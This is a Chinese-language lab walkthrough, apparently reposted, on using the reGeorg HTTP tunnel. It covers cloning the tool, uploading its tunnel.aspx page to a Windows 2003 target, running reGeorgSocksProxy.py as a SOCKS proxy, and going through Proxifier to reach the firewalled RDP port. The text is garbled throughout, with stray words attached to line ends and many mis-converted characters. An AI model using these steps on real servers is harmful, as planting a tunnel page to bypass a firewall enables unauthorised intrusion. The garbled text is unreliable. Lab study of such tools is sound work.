reGeorg的前身是2008年SensePost在BlackHat USA 2008 的 reDuh延伸與擴展。也是目 前安全從業人員使用最多,範圍最廣,支持多豐富的一款http隧道。從本質上講,能夠將 JSP/PHP/ASP/ASPX等頁面上傳到目標服務器,即可以訪問該服務器後面的主機。python
攻擊機: 192.168.31.102 kaligit
192.168.31.96 win 10github
靶機: 192.168.31.106 Windows 2003安全
下載:服務器
https://github.com/sensepost/reGeorgpost
安裝:url
git clone https://github.com/sensepost/reGeorg.gitspa
ls3d
python reGeorgSocksProxy.py ‐h代理
PS:這個程序須要安裝PIP urllib3 個人已經裝了
若是沒有安裝的話執行命令:
pip install urllib3
安裝完成後把reGeorg 下的tunnel上傳到目標靶機
目標靶機是開了防火牆的咱們訪問是訪問3389是不通的
接下來配置代理
Kali攻擊機執行
python reGeorgSocksProxy.py -u "http://192.168.31.106/include/config/tunnel.aspx" -p 8080 -l 0.0.0.0
þ 這裏咱們來說講0.0.0.0,若是咱們直接ping 0.0.0.0是不行的,他在IPV4中表示的是無效的目標地址,可是在服務器端它表示
本機上的全部IPV4地址,若是一個服務有多個IP地址(192.168.1.2和10.1.1.12),那麼咱們若是設置的監聽地址是0.0.0.0那
麼咱們不管是經過IP192.168.1.2仍是10.1.1.12都是能夠訪問該服務的。在路由中,0.0.0.0表示的是默認路由,即當路由表中
沒有找到徹底匹配的路由的時候所對應的路由。
這時候在操做機器
Windows10下配合Proxifier: (沒有這個程序的怎末辦?百度!)
或者連接:https://pan.baidu.com/s/1XunHE8RiLu_K4JpWMpVDoA
提取碼:txe6
鏈接3389